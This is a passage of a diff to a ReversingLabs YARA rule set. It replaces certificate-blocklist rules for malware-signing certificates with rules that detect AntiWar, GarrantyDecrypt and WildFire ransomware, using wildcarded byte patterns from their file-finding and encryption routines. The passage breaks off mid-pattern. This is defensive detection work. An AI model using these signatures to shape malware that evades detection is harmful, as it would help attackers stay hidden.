+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $modify_processes_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_133565779808C3B79D8E3F70A9C3Ffac : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Antiwar : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AntiWar ransomware."
 		author = "ReversingLabs"
-		id = "bc3f54a6-723d-5de5-9a59-2be8a005cedc"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "3113ec26-e149-527b-9478-4dd86c7fa464"
+		date = "2022-04-21"
+		modified = "2022-04-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6618-L6634"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b9fb2e3cc150b0278e67c673f7c01174c30b2cc4458c9c5e573661071795b793"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.AntiWar.yara#L1-L146"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2d885f35454aaf7cb33f03c30b6681aa16cbe8353003bbae0b1e9fdecb2ff8a7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "AntiWar"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
+            48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 4C 8B F0 48 89 44 24 ?? 48 83 F8 ??
+            0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 41 8B DC 48 8D 3D ?? ?? ?? ?? 66 90 48 8B 0F
+            E8 ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? FF C3 48 83 C7 ?? 83 FB ?? 72 ?? 49 8B D7 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ??
+            F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03
+            00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 C7 85 ?? ?? 00 00 ?? ?? 8B 05 ?? ?? ?? ?? 4C 8D
+            3C C5 ?? ?? ?? ?? 41 BC ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04
+            0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11 35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 89 05 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 45 33
+            C9 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ?? ?? ?? ?? ?? 66
+            66 0F 1F 84 00 ?? ?? 00 00 4B 8D 14 31 41 0F B6 C9 80 E1 ?? C0 E1 ?? 49 8B C3 48 D3
+        }
+		$find_files_p2 = {
+            E8 30 02 4C 8D 42 ?? 41 8D 0C 12 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 10 49 83
+            C1 ?? 49 83 F9 ?? 72 ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 E8 ?? 48 63 C8 78 ?? 0F 1F 40 ?? 66 83 BC
+            4D ?? ?? 00 00 ?? 74 ?? FF C8 48 83 E9 ?? 79 ?? EB ?? B3 ?? 48 98 4C 8D B5 ?? ?? ??
+            ?? 4D 8D 34 46 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 45 33 ED 48 8B 0F E8 ?? ?? ?? ??
+            48 8B D0 49 8B CE FF 15 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DD 48 8D 7F ?? 48 83 EE
+            ?? 75 ?? 4C 8B 6C 24 ?? 4C 8B 74 24 ?? 84 DB 0F 84 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ??
+            45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF
+            90 89 BD ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B D8 48 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 83 3D ?? ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 85 C9 0F 84 ?? ?? ?? ?? 83 79 ?? ?? 0F 8C
+            ?? ?? ?? ?? 66 0F 6F 35 ?? ?? 03 00 66 0F 6F 3D ?? ?? 03 00 66 C7 85 ?? ?? 00 00 ??
+            ?? 65 48 8B 04 25 ?? ?? ?? ?? 4A 8B 0C 38 41 8B 04 0C 39 05 ?? ?? ?? ?? 7E ?? 48 8D
+            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? C6 05 ?? ?? ?? ?? ?? 0F 11
+            35 ?? ?? ?? ?? 0F 11 3D ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66 89 05 ?? ?? 04 00 48 8D
+        }
+		$find_files_p3 = {
+            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ??
+            ?? 74 ?? 48 8B C7 41 BA ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4D 2B D6 49 BB ?? ?? ?? ??
+            ?? ?? ?? ?? 90 4E 8D 0C 30 0F B6 C8 80 E1 ?? C0 E1 ?? 4D 8B C3 49 D3 E8 45 30 01 43
+            8D 0C 11 80 E1 ?? C0 E1 ?? 49 8B D3 48 D3 EA 41 30 51 ?? 48 83 C0 ?? 48 83 F8 ?? 72
+            ?? 4C 8B 74 24 ?? C6 05 ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ??
+            ?? ?? ?? 48 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 66 89 BD ?? ?? 00 00 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ??
+            48 8D 4D ?? E8 ?? ?? ?? ?? 48 8B D6 48 85 DB 48 0F 45 D3 48 8D 4D ?? E8 ?? ?? ?? ??
+            48 8B 3D ?? ?? ?? ?? 48 8B 5F ?? 48 3B 5F ?? 74 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0B
+        }
+		$find_files_p4 = {
+            48 8B 01 48 8D 54 24 ?? FF 50 ?? 48 83 C3 ?? 48 3B 5F ?? 75 ?? 48 8D 05 ?? ?? ?? ??
+            48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ??
+            72 ?? 48 FF C2 48 8B 8D ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ??
+            48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF
+            48 89 BD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 BD ?? ?? ?? ?? 48 8D 4D
+            ?? E8 ?? ?? ?? ?? EB ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 4C 8D 85 ??
+            ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 85 ?? ?? ??
+            ?? 45 33 C0 49 8B D5 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45
+            33 E4 4C 8B 7C 24 ?? 48 8D 95 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 85 C0
+        }
+		$enum_shares = {
+            48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24 ?? 33 D2 C7 44 24 ?? ?? ?? ??
+            ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42
+            ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ??
+            48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54
+            24 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 89 5C 24 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00
+            ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ?? 48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ??
+            48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B 5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C
+            8B C7 48 8D 54 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 5C 24 ?? 48 8B CF E8 ?? ?? ??
+            ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ??
+            ?? 48 83 C4 ?? C3
+        }
+		$encrypt_files_p1 = {
+            48 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA
+            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 8B 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 49 83 FE ?? 0F 84 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49
+            8B CE FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8B F8 48 85 C0 0F 84 ?? ??
+            ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 80
+            A5 ?? ?? ?? ?? ?? 0F B6 8D ?? ?? ?? ?? 80 E1 ?? 80 C9 ?? 88 8D ?? ?? ?? ?? 4C 8D 85
+            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ??
+            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 45 8B C1 48 8D
+            95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ??
+            ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 44 8D 42 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B DE 45 33 C9 45 33 C0 48 8B D6 49 8B CE FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
+            ?? 48 81 F9 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 E9 48
+        }
+		$encrypt_files_p2 = {
+            8B FA 48 C1 FF ?? 48 8B C7 48 C1 E8 ?? 48 03 F8 48 85 FF 0F 8E ?? ?? ?? ?? 48 89 74
+            24 ?? 4C 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 89 44 24 ?? 4D 8B CF 4D 8B C7 48 8D 95 ?? ?? ?? ?? 33 C9 E8 ?? ?? ??
+            ?? 45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 89 74 24 ?? 4C 8D 8D ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ??
+            45 33 C9 45 33 C0 48 8B D3 49 8B CE FF 15 ?? ?? ?? ?? 48 83 EF ?? 0F 85 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 83 78 ?? ?? 0F 8C ??
+            ?? ?? ?? 41 8B C6 48 8D 1C C5 ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B 0C 18 8B
+            04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
+            ?? 75 ?? 66 C7 05 ?? ?? 05 00 ?? ?? C6 05 ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 74 ?? 80 35 ?? ??
+            ?? ?? ?? 80 35 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 8B
+            0C 18 8B 04 0F 39 05 ?? ?? ?? ?? 7E ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ??
+            ?? ?? ?? ?? 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Istok" and pe.signatures [ i ] . serial == "13:35:65:77:98:08:c3:b7:9d:8e:3f:70:a9:c3:ff:ac" and 1605019819 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_shares ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Garrantydecrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GarrantyDecrypt ransomware."
 		author = "ReversingLabs"
-		id = "4668ceb3-8bf2-5be4-9a1a-d0d902c35cf0"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "0aa05f06-1773-5ce8-892d-04468f5deccc"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6636-L6654"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f13f9b70a2a3187522e4fff45a8a425863ad6242f82592aa9319c8d5fddeeefa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.GarrantyDecrypt.yara#L1-L79"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7194c1e0e15a89f2c691a7d586b9db68295cc52a5f042d0f7eb558c326430444"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GarrantyDecrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 8D 45 ?? 50 89 5D ?? FF D6 85 C0 75
+            ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 45 ?? 50 FF D6 85 C0 74 ?? 8B 45 ?? A3 ?? ?? ?? ??
+            3B C3 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 3B F3 0F 84 ?? ?? ?? ?? 8B 7E ?? 8B 46
+            ?? 33 C9 3B FB 76 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 29 45 ?? 8B 55 ?? 8D 84 0D ?? ?? ??
+            ?? 8A 14 02 41 88 10 3B CF 72 ?? 68 ?? ?? ?? ?? 53 53 FF 76 ?? FF 36 FF 35 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 3B FB 74 ?? 8B 46 ?? 68 ?? ?? ?? ?? 89 45
+            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B
+            45 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 36 E8
+            ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 53 FF
+            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15
+        }
+		$encrypt_files_p2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 50 6A ?? 5F 57 FF 35 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 E8 ?? ?? ?? ?? 8B C8 33 DB 89 4D ?? 3B
+            CB 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 7D ?? 8B F1 2B C1 8A 14 30 88 16 46 4F 75 ?? 6A ??
+            8D 45 ?? 50 51 53 6A ?? 53 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 53 68 ?? ??
+            ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ??
+            ?? ?? ?? 89 5D ?? 89 5D ?? 8B 3D ?? ?? ?? ?? 56 FF D7 8D 04 46 83 E8 ?? 66 83 38 ??
+            75 ?? 8B 4D ?? FF B1 ?? ?? ?? ?? 2B C6 83 C0 ?? D1 F8 8D 04 46 50 FF 15 ?? ?? ?? ??
+            3B C3 74 ?? 50 FF D7 8B 4D ?? FF B1 ?? ?? ?? ?? 89 45 ?? FF D7 39 45 ?? 74 ?? 83 45
+            ?? ?? 83 7D ?? ?? 72 ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            3D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68
+            ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 33 C0 89 5D ?? 3B
+            C3 72 ?? 77 ?? 39 5D ?? 76 ?? 8B 45 ?? 8B C8 81 E1 ?? ?? ?? ?? 79 ?? 49 83 C9 ?? 41
+            89 4D ?? 75 ?? 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50 8D 85 ?? ?? ?? ?? 50 8D 45 ?? E8
+            ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 55 ?? 8B 45 ?? 8A 8C 0D ?? ?? ?? ?? 30 0C 10 FF 45
+            ?? 8B 45 ?? 99 33 C9 3B D1 72 ?? 77 ?? 3B 45 ?? 72 ?? 8B 45 ?? 6A ?? F7 D8 99 53 52
+            50 FF 75 ?? FF D7 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF D6 39 5D ?? 74 ?? 81
+            7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50
+            FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D7 53 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF D6
+            53 8D 45 ?? 50 6A ?? FF 75 ?? FF 75 ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B F0 3B F3 74 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            59 FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
+        }
+		$find_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? 85
+            DB 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53
+            FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ??
+            ?? ?? ?? BB ?? ?? ?? ?? 83 65 ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 72 ?? 8D 85 ?? ??
+            ?? ?? 50 FF 75 ?? 53 57 FF 75 ?? FF D6 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? FF 75
+            ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 53 57 FF 75 ?? FF D6 83
+            C4 ?? 33 F6 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? 8B D8 83 FB ?? 74 ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 BF ?? ?? ?? ?? 57 FF D6 50
+            57 8B 3D ?? ?? ?? ?? 53 FF D7 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? FF D6 50 FF 35 ??
+            ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orangetree B.V." and ( pe.signatures [ i ] . serial == "00:7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" or pe.signatures [ i ] . serial == "7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" ) and 1606159604 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $find_files and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Bad35Fd70025D46C56B89E32B1A3954C : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wildfire : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WildFire ransomware."
 		author = "ReversingLabs"
-		id = "871e399f-8498-5d66-ab5e-24e48491124f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "0c44f017-703c-5db7-b777-62fcd181af9a"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6656-L6674"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1020250fc5030e50bc1e7d0f0c5a77e462a53f47bfcc4383c682b34fed567492"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.WildFire.yara#L1-L77"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d3be2eac7967853aae6e1317d9c22d95a3dc4b3e5bf8acbe97a7bbeabc9eab38"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WildFire"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            00 02 19 17 73 ?? ?? ?? ?? 0A 1B 8D ?? ?? ?? ?? 25 16 02 16 02 [5-10] 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? A2 25 17 [5-10] A2 25 18 7E ?? ?? ?? ?? A2 25 19 [5-10] A2 25 1A 02 02
+            [5-10] 6F ?? ?? ?? ?? 17 D6 6F ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0B 07 [5-10] 28 ?? ?? ??
+            ?? 1A 18 73 ?? ?? ?? ?? 0C 08 21 00 00 00 00 00 00 00 00 6F ?? ?? ?? ?? 20 ?? ?? ?? ??
+            8D ?? ?? ?? ?? 0D 21 00 00 00 00 00 00 00 00 13 ?? 06 6F ?? ?? ?? ?? 13 ?? 73 ?? ?? ??
